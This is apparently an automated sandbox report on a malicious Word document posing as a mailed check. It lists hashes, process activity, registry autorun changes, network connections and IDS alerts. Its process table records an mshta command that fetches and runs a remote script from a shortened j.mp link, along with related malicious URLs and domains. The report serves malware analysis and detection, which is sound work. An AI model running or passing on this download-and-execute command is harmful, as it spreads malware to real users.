| File name: | mailed-Check.docx |
| Full analysis: | https://app.any.run/tasks/b0f0b1dc-998f-4ff4-ac65-797a9c6c6502 |
| Verdict: | Malicious activity |
| Analysis date: | October 09, 2019, 17:41:51 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info: | Microsoft Word 2007+ |
| MD5: | E1A140C17F21569B80E3B836AA6DE961 |
| SHA1: | D1BE9467536D6CF8CF9BEABEDEAF8C97E0FC50F9 |
| SHA256: | 25ABB81E40FC852703936AE6D34C95A0C8265394BA738063FCC2521698A80A9E |
| SSDEEP: | 1536:XrellrelGrzB/QhoCDW+4oDCdYH6oi4jRafCHx:Xrezre8/aDCdFoBjRaaR |
MALICIOUS
Starts MSHTA.EXE for opening HTA or HTMLS files
- EXCEL.EXE (PID: 2872)
- EXCEL.EXE (PID: 2224)
- EXCEL.EXE (PID: 1472)
- EXCEL.EXE (PID: 432)
- EXCEL.EXE (PID: 4004)
- EXCEL.EXE (PID: 712)
Changes the autorun value in the registry
- mshta.exe (PID: 2356)
- mshta.exe (PID: 2716)
- mshta.exe (PID: 2984)
- mshta.exe (PID: 2604)
- mshta.exe (PID: 2788)
- mshta.exe (PID: 3896)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 2224)
- EXCEL.EXE (PID: 2872)
- EXCEL.EXE (PID: 1472)
- EXCEL.EXE (PID: 4004)
- EXCEL.EXE (PID: 432)
- EXCEL.EXE (PID: 712)
SUSPICIOUS
Executed via COM
- EXCEL.EXE (PID: 2224)
- EXCEL.EXE (PID: 1472)
- EXCEL.EXE (PID: 2872)
- EXCEL.EXE (PID: 432)
- EXCEL.EXE (PID: 4004)
- excelcnv.exe (PID: 2712)
- EXCEL.EXE (PID: 712)
- excelcnv.exe (PID: 2528)
- excelcnv.exe (PID: 3312)
- excelcnv.exe (PID: 2956)
- excelcnv.exe (PID: 3960)
- excelcnv.exe (PID: 1680)
Creates files in the user directory
- mshta.exe (PID: 2356)
- mshta.exe (PID: 2716)
- mshta.exe (PID: 2604)
- mshta.exe (PID: 3896)
- mshta.exe (PID: 2788)
- mshta.exe (PID: 2984)
Reads Internet Cache Settings
- mshta.exe (PID: 3896)
- mshta.exe (PID: 2984)
INFO
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 2224)
- EXCEL.EXE (PID: 2872)
- EXCEL.EXE (PID: 1472)
- EXCEL.EXE (PID: 432)
- EXCEL.EXE (PID: 4004)
- EXCEL.EXE (PID: 712)
- excelcnv.exe (PID: 2712)
- excelcnv.exe (PID: 2528)
- excelcnv.exe (PID: 3312)
- excelcnv.exe (PID: 2956)
- excelcnv.exe (PID: 3960)
- excelcnv.exe (PID: 1680)
- WINWORD.EXE (PID: 3084)
Reads internet explorer settings
- mshta.exe (PID: 2716)
- mshta.exe (PID: 2356)
- mshta.exe (PID: 2604)
- mshta.exe (PID: 3896)
- mshta.exe (PID: 2788)
- mshta.exe (PID: 2984)
Creates files in the user directory
- WINWORD.EXE (PID: 3084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .docx | | | Word Microsoft Office Open XML Format document (52.2) |
|---|---|---|
| .zip | | | Open Packaging Conventions container (38.8) |
| .zip | | | ZIP compressed archive (8.8) |
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0006 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:01:01 00:00:00 |
| ZipCRC: | 0xc59e8d53 |
| ZipCompressedSize: | 368 |
| ZipUncompressedSize: | 1416 |
| ZipFileName: | [Content_Types].xml |
XMP
| Title: | - |
|---|---|
| Subject: | - |
| Creator: | DA JADE |
| Description: | - |
XML
| Keywords: | - |
|---|---|
| LastModifiedBy: | DA JADE |
| RevisionNumber: | 2 |
| CreateDate: | 2019:09:28 23:42:00Z |
| ModifyDate: | 2019:09:28 23:43:00Z |
| Template: | Normal.dotm |
| TotalEditTime: | 1 minute |
| Pages: | 1 |
| Words: | 9 |
| Characters: | 52 |
| Application: | Microsoft Office Word |
| DocSecurity: | None |
| Lines: | 1 |
| Paragraphs: | 1 |
| ScaleCrop: | No |
| Company: | - |
| LinksUpToDate: | No |
| CharactersWithSpaces: | 60 |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| AppVersion: | 16 |
Total processes
51
Monitored processes
19
Malicious processes
8
Suspicious processes
4
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 432 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 712 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 1472 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 1680 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2224 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2356 | mshta http:\\j.mp\adjkby5sxfsaasdi | C:\Windows\system32\mshta.exe | EXCEL.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2528 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2604 | mshta http:\\j.mp\adjkby5sxfsaasdi | C:\Windows\system32\mshta.exe | EXCEL.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2712 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2716 | mshta http:\\j.mp\adjkby5sxfsaasdi | C:\Windows\system32\mshta.exe | EXCEL.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
30 882
Read events
10 610
Write events
20 181
Delete events
91
Modification events
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | !5< |
Value: 21353C000C0C0000010000000000000000000000 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1330184243 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1330184359 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1330184360 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 0C0C0000B08C7ADEC87ED50100000000 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | +6< |
Value: 2B363C000C0C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | +6< |
Value: 2B363C000C0C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3084) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
28
Text files
113
Unknown types
14
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD21.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F0DC276.wmf | — | |
MD5:— | SHA256:— | |||
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{522D3A7A-7001-4A70-A293-377AE0556511} | — | |
MD5:— | SHA256:— | |||
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{D18F18BE-CF00-48C3-B650-D4182C6E60D1} | — | |
MD5:— | SHA256:— | |||
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75C109BB.doc | — | |
MD5:— | SHA256:— | |||
| 2872 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9BA5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2872 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF93A76D686AADBAF2.TMP | — | |
MD5:— | SHA256:— | |||
| 2224 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD1F8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2356 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css | — | |
MD5:— | SHA256:— | |||
| 3084 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D51C0D37.wmf | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
93
DNS requests
14
Threats
7
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3084 | WINWORD.EXE | HEAD | 301 | 67.199.248.16:80 | http://j.mp/updatedic13 | US | — | — | shared |
3084 | WINWORD.EXE | HEAD | 301 | 67.199.248.16:80 | http://j.mp/updatedic13 | US | — | — | shared |
3084 | WINWORD.EXE | HEAD | 301 | 67.199.248.16:80 | http://j.mp/updatedic13 | US | — | — | shared |
3084 | WINWORD.EXE | GET | 301 | 67.199.248.17:80 | http://j.mp/updatedic13 | US | html | 163 b | shared |
3084 | WINWORD.EXE | OPTIONS | 405 | 67.199.248.17:80 | http://j.mp/ | US | html | 109 b | shared |
3084 | WINWORD.EXE | GET | 301 | 67.199.248.17:80 | http://j.mp/updatedic13 | US | html | 163 b | shared |
3084 | WINWORD.EXE | HEAD | 301 | 67.199.248.17:80 | http://j.mp/updatedic13 | US | html | 163 b | shared |
3084 | WINWORD.EXE | GET | 301 | 67.199.248.17:80 | http://j.mp/updatedic13 | US | html | 163 b | shared |
3084 | WINWORD.EXE | OPTIONS | 405 | 67.199.248.17:80 | http://j.mp/ | US | html | 109 b | shared |
3084 | WINWORD.EXE | OPTIONS | 405 | 67.199.248.17:80 | http://j.mp/ | US | html | 109 b | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2716 | mshta.exe | 67.199.248.16:80 | j.mp | Bitly Inc | US | shared |
3084 | WINWORD.EXE | 67.199.248.16:80 | j.mp | Bitly Inc | US | shared |
3084 | WINWORD.EXE | 67.199.248.17:80 | j.mp | Bitly Inc | US | shared |
976 | svchost.exe | 67.199.248.16:80 | j.mp | Bitly Inc | US | shared |
3084 | WINWORD.EXE | 35.241.16.116:443 | static.wixstatic.com | — | US | unknown |
2356 | mshta.exe | 67.199.248.16:80 | j.mp | Bitly Inc | US | shared |
2356 | mshta.exe | 172.217.22.97:443 | asdiamecwecw8cew.blogspot.com | Google Inc. | US | whitelisted |
2356 | mshta.exe | 172.217.23.163:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
2356 | mshta.exe | 172.217.18.110:443 | www.google-analytics.com | Google Inc. | US | whitelisted |
2716 | mshta.exe | 172.217.22.10:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
j.mp |
| shared |
dns.msftncsi.com |
| shared |
static.wixstatic.com |
| whitelisted |
asdiamecwecw8cew.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
fonts.googleapis.com |
| whitelisted |
www.google.com |
| malicious |
fonts.gstatic.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3084 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2356 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2716 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3896 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2984 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2604 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2788 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |